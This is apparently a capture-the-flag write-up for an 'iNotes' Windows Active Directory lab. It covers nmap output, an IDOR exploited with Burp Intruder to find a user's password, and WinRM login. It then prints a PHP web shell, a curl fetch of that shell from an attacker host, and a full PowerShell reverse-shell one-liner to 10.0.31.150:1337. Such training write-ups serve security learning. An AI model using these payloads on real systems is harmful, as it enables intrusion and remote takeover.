Published on

iNotes Writeup

Authors
logo

Port Scanning

nmap -sV -sC -p- -v $IP --open

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.0.30)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: iNotes
|_Requested resource was /login.php
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-13 13:09:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: inotes.hc0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
| http-ls: Volume /
|   maxfiles limit reached (10)
| SIZE  TIME              FILENAME
| 241   2024-11-06 22:10  bootstrap.php
| -     2024-11-06 22:11  database/
| 20K   2024-11-13 13:10  database/database.sqlite
| -     2024-11-06 22:10  functions/
| 129   2024-11-06 22:10  functions/auth.php
| 319   2024-11-06 22:10  functions/db.php
| 416   2024-11-06 22:10  functions/flash.php
| 82    2024-11-06 22:10  functions/utils.php
| 137   2024-11-06 04:43  mssql.xml
| -     2024-11-06 22:10  public/
|_
| http-methods:
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-title: Index of /
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: inotes.hc0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=EC2AMAZ-76KN0U2.inotes.hc
| Issuer: commonName=EC2AMAZ-76KN0U2.inotes.hc
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-03T21:38:30
| Not valid after:  2025-05-05T21:38:30
| MD5:   1381:f5d4:0072:f117:f26e:3077:5362:4890
|_SHA-1: c4ea:7d46:283c:050f:3c94:9a76:e862:4323:4260:5a64
| rdp-ntlm-info:
|   Target_Name: INOTES
|   NetBIOS_Domain_Name: INOTES
|   NetBIOS_Computer_Name: EC2AMAZ-76KN0U2
|   DNS_Domain_Name: inotes.hc
|   DNS_Computer_Name: EC2AMAZ-76KN0U2.inotes.hc
|   Product_Version: 10.0.20348
|_  System_Time: 2024-11-13T13:10:37+00:00
|_ssl-date: 2024-11-13T13:10:46+00:00; 0s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
49713/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: EC2AMAZ-76KN0U2, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-11-13T13:10:39
|_  start_date: N/A

Since this is a Windows (AD) machine, many services on multiple ports are open.


Enumeration

http://172.16.4.116

inotes

I tried SQL Injection on the login field but was unsuccessful, so I decided to register a new user.

inotes 1

After logging in.

inotes 2

Creating a test note.

inotes 3

IDOR found by changing the note ID.

inotes 4
inotes 5

Using the IDOR to enumerate and read all the notes in the application.

I generated a wordlist containing the numbers from 1 to 107.

seq 1 107 > wordlists.txt

Then, I sent the wordlist to BurpSuite's Intruder to enumerate all the IDs.

inotes 6

ID number 97 reveals the credentials of the user john.

john:Dn*Th5di7UwFJvTM

inotes 7

Foot Hold

The AD has several open services, however, the only accessible one with the credentials found was WinRM on port 5985. With the credentials in hand, we can log into the machine via WinRM.

evil-winrm -i 172.16.4.176 -u john -p Dn*Th5di7UwFJvTM

inotes 8

Privillege Escalation

The machine has XAMPP installed, so I created a PHP web shell.

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

With this, I uploaded the web shell to the XAMPP directory, which is located at: C:\xampp\htdocs

curl http://10.0.31.150/shell.php -o shell.php

inotes 9
inotes 10

https://172.16.4.176/shell.php?cmd=whoami

inotes 11

Finally, you can use the web shell to grab the final flag or create a reverse shell.

https://172.16.4.176/shell.php?cmd=powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.31.150',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Note: Be sure to encode the payload.

inotes 12

Proof

inotes 12